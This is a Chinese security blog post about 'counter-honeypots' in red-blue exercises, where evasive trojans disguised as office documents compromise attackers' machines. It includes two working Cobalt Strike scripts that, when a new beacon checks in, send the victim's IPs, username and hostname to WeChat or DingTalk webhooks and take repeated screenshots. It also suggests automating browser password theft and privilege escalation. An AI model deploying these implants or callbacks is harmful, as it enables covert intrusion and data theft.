实战|2023HVV反制蜜罐上线提醒实例以及思考

admin 2024年10月7日19:11:59评论30 views字数 3278阅读10分55秒阅读模式
实战|2023HVV反制蜜罐上线提醒实例以及思考
实战|2023HVV反制蜜罐上线提醒实例以及思考

0x01

前言

现阶段蓝队防守不单单仅限制于传统的ip封禁以及高交互蜜罐的监控以及简单的身份溯源,红队攻击信息上报以及攻击方式多样化,包括参与攻击的人员不单单限制于上报人员,所以对于蓝队来讲溯源难度要匹配红队上报信息也是存在一定的难度,所以在攻防演练中蓝队的得分难度相对来说更难一点儿。

0x02 

思路

高交互蜜罐在拖延攻击时间上来讲确实有一定的帮助,有助于写防守报告,这种在得分上来讲还是比较容易匹配到红队的"攻击成果"。

反制蜜罐的目的是拿攻击者的权限,那么目前只是单纯的要拿攻击队机器的数据,那么该数据信息获取途径或者说证明途径

  • 截图,攻击机截图

  • 攻击机浏览器存储账号密码

  • 攻击机浏览器历史记录

免杀

没有免杀的马是没有意义的,另外仅仅存在免杀的木马也是没有意义的。早在今年年初我们团队其实就已经实现了,从免杀木马与文件无感知交互的功能,在上线难度来说,点击即可上线,点击后的效果就是文件满足任意文件类型,包括doc、docx、xlsx等,对接高交互蜜罐系统,方便溯源报告,比如下面这种点击木马上线后无感知,攻击者看到的效果就是下图内容。

实战|2023HVV反制蜜罐上线提醒实例以及思考

优势

对蓝队来讲,只需放饵即可,对于红队来讲,在攻击手法上效果更好,无感知中毒。

题外话对于钓鱼的弊端来讲腾讯、网易这些邮箱厂商,对于邮件的打标签比较严重,批量成为难度,阈值的话自己测试。

0x03

上线提醒

对于蓝队来说,目前实现上线提醒,包括攻击机上线自动化执行是成为得分的重要环节。那么实现的思路,目前的话我们是从这几点出发:

  • 提醒的话可以根据日志来实现,CS木马上线之后log目录存在日志。可利用python脚本监控日志报警

  • 插件提醒,利用CS插件提醒。微信或者其它攻击webhook

这里主要说第二种方式。

推荐一个插件。

https://github.com/d3ckx1/CS_Online_reminder/tree/main/weixin

这个脚本中提供了,微信调用提醒,不过可以联动其它软件,比如说飞书或者钉钉等其它工具

on beacon_initial {  sub http_get {    local('$output');    $url = [new java.net.URL: $1];    $stream = [$url openStream];    $handle = [SleepUtils getIOHandle: $stream, $null];    @content = readAll($handle);    foreach $line (@content) {      $output .= $line . "rn";    }    println($output);  }  $internalIP = replace(beacon_info($1, "internal"), " ", "_");  $userName = replace(beacon_info($1, "user"), " ", "_");  $computerName = replace(beacon_info($1, "computer"), " ", "_");  $url = 'https://sc.ftqq.com/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.send?text=CobaltStrike%20Online%20Reminder&desp=%0D%0A%0D%0AIP:'.$internalIP.'%0D%0A%0D%0AUserName:'.$userName.'%0D%0A%0D%0AHostName:'.$computerName;  http_get($url);}

这里利用了方糖的api,需付费使用,说实话能自己调试代码走钉钉的话,一个月8块省下了,交互方式如图

实战|2023HVV反制蜜罐上线提醒实例以及思考

缺点就是花钱,数据经过第三方转发。不建议使用,非会员的测试数5条

实战|2023HVV反制蜜罐上线提醒实例以及思考

使用需配置key

实战|2023HVV反制蜜罐上线提醒实例以及思考

界面提醒如下

实战|2023HVV反制蜜罐上线提醒实例以及思考

群发的话,接dding

实战|2023HVV反制蜜罐上线提醒实例以及思考

效果如下:

实战|2023HVV反制蜜罐上线提醒实例以及思考

当然参数的话自己选择,代码怎么改看自己心情。

0x04

小结

为什么说不建议使用,第一数据经第三方服务端,第二*糖的机制限定

| 单 IP 每天 API 最大请求次数 | 5000 |
| ---------------------------- | ---- |
| 单 UID 每天 API 最大请求次数 | 1000 |

0x05

Tricks

拓展一下,单独的提醒能满足一部分需求,但是解决不了蓝队或者红队最大的需求,那么如何实现自动化需要考虑一下。

有时间分享一下上线自动化功能,有兴趣的可以尝试一下自动化,不单单指上线提醒自动化,还包含执行自动化,结合前面思路。

下面分享一个Ggoodstudy师傅分享的自动化插件,可以直接调用第三方接口,接钉钉即可。

#---AuthOr:Ggoodstudy---$dt_bot_webhookURL = 'https://oapi.dingtalk.com/robot/send?access_token=xxxxxxxxxxxxxxxxxxx';$targetInfo_txt = " ----存在新上线主机----n>";$listener_txt = "监听:";$externalIp_txt = "  n  公网IP:";$internalIp_txt = "  n  内网IP:";$computerName_txt = "  n  主机名:";$userName_txt = "  n  当前用户:";on beacon_initial {    local('$internalIP $computerName $userName');    $internalIP = replace(beacon_info($1, "internal"), " ", "_");    $externalIP = replace(beacon_info($1, "external"), " ", "_");    $computerName = replace(beacon_info($1, "computer"), " ", "_");    $userName = replace(beacon_info($1, "user"), " ", "_");    $listennerName = replace(beacon_info($1, "listener"), " ", "_");    #修改睡眠时间    bsleep($1, 10, 10);    $dt_msg = "{"msgtype": "markdown","markdown": {"title":"新主机上线","text":'.'"'.$targetInfo_txt.$listener_txt.$listennerName.$externalIp_txt.$externalIP.$internalIp_txt.$internalIP.$computerName_txt.$computerName.$userName_txt.$userName.'"'.'}}";    @curl_command = @('curl', '-H', 'Content-Type: application/json', '-d',$dt_msg,$dt_bot_webhookURL);    $process = exec(@curl_command);    binput($1, "printscreen");    bprintscreen($1);    #10s截图一次    sleep(10 * 1000);    bprintscreen($1);}

所以其它的功能有兴趣的师傅可以尝试一下,比如说自动化爬取浏览器存储账号密码以及自动化提权做定时任务,完全是可行的。

往期推荐

实战|2023HVV反制蜜罐上线提醒实例以及思考

实战|2023HVV反制蜜罐上线提醒实例以及思考

实战|2023HVV反制蜜罐上线提醒实例以及思考

实战|2023HVV反制蜜罐上线提醒实例以及思考

火线Zone是火线安全平台运营的安全社区,拥有超过20,000名可信白帽安全专家,内容涵盖渗透测试、红蓝对抗、漏洞分析、代码审计、漏洞复现等热门主题,旨在研究讨论实战攻防技术,助力社区安全专家技术成长,2年内已贡献1300+原创攻防内容,提交了100,000+原创安全漏洞。

欢迎具备分享和探索精神的你加入火线Zone社区,一起分享技术干货,共建一个有技术氛围的优质安全社区!

原文始发于微信公众号(火线Zone):实战|2023HVV反制蜜罐上线提醒实例以及思考

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月7日19:11:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战|2023HVV反制蜜罐上线提醒实例以及思考https://cn-sec.com/archives/1969255.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息